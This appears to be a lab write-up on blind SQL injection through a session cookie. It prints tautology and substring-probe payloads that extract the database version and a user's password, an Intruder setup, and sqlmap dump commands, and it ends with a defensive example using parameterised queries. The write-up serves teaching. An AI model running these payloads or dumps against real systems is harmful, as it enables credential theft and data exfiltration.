Injection 0x02

First, log in as the user jeremy to get a valid session cookie.

Then send the GET request carrying the session cookie to Repeater.

Try placing an injection payload in the session cookie.

This is a blind injection: the response does not return any query output, only a change in behaviour.

Cookie: session=6967cabefd763ac1a1a88e11159957db' or 1=1#

Now we enumerate the SQL version.

First we try 7 as the first character,

but the response is the error page, with content length 1928:

Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select version()),1,1) = '7'#

Then, when we try 8,

we get the access (success) response, with content length 1027:

Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select version()),1,1) = '8'#

Next, the first three characters:

Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select version()),1,3) = '8.0'#

Continuing this way, we determine that the MySQL version is 8.0.3:

Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select version()),1,5) = '8.0.3'#

Now we extract the password of the user jessamy, one character at a time:

Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select password from injection0x02 where username = 'jessamy'),1,1) = 'a'#

Put this in Intruder, with the first character as the payload position:

Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select password from injection0x02 where username = 'jessamy'), 1, 1) = '§a§'#

Use the alphabet (a-z) and (A-Z) as the payload list.

We can see that z and Z are accepted.

We could continue manually like this, but it takes time.

For the second letter, since we know the first letter is z or Z:

Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select password from injection0x02 where username = 'jessamy'), 2, 1) = '§b§'#

Or we could use sqlmap.

Save the GET request with the session cookie to a file (session.txt) and run:

# --level=2 is needed for cookie testing
sqlmap -r session.txt --level=2
# This will dump all data from each database/table
sqlmap -r session.txt --level=2 --dump

But we only want the injection0x02 table:

# --level=2 is needed for cookie testing
# This will dump all data from the table injection0x02
sqlmap -r session.txt --level=2 --dump -T injection0x02
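The root cause on this page is a session lookup that concatenates the cookie value into SQL. The following is an added example, not code from the challenge or from sqlmap; it uses an in-memory sqlite3 database as a stand-in for the MySQL backend (so the comment token is -- instead of #), a constructed sessions table with the page's session id, and shows the vulnerable lookup beside a parameterised one plus a format check on the cookie.

```python
import re
import sqlite3

# Constructed sample data: the session id from the page, mapped to user jeremy.
SESSION_ID = "6967cabefd763ac1a1a88e11159957db"

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sessions (session TEXT, username TEXT)")
    db.execute("INSERT INTO sessions VALUES (?, ?)", (SESSION_ID, "jeremy"))
    return db

def lookup_vulnerable(db, cookie):
    # The bug on the page: the cookie value becomes part of the SQL text,
    # so a quote in the cookie ends the string and the rest is executed.
    sql = "SELECT username FROM sessions WHERE session = '" + cookie + "'"
    return db.execute(sql).fetchone()

def lookup_hardened(db, cookie):
    # Bound parameter: the cookie is compared as data and never parsed as SQL.
    sql = "SELECT username FROM sessions WHERE session = ?"
    return db.execute(sql, (cookie,)).fetchone()

# Session ids are 32 lowercase hex characters; reject anything else up front.
SESSION_RE = re.compile(r"[0-9a-f]{32}")

def is_valid_session_format(cookie):
    return SESSION_RE.fullmatch(cookie) is not None

def handle_request(db, cookie):
    # Defence in depth: validate the format, then use the parameterised query.
    if not is_valid_session_format(cookie):
        return None
    row = lookup_hardened(db, cookie)
    return row[0] if row else None
```

Against the vulnerable lookup the tautology cookie from the page returns a row, and a version probe of the form substr(...)='x' returns a row only when the guess is right, which is the boolean oracle the page exploits; the hardened path returns nothing for either.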
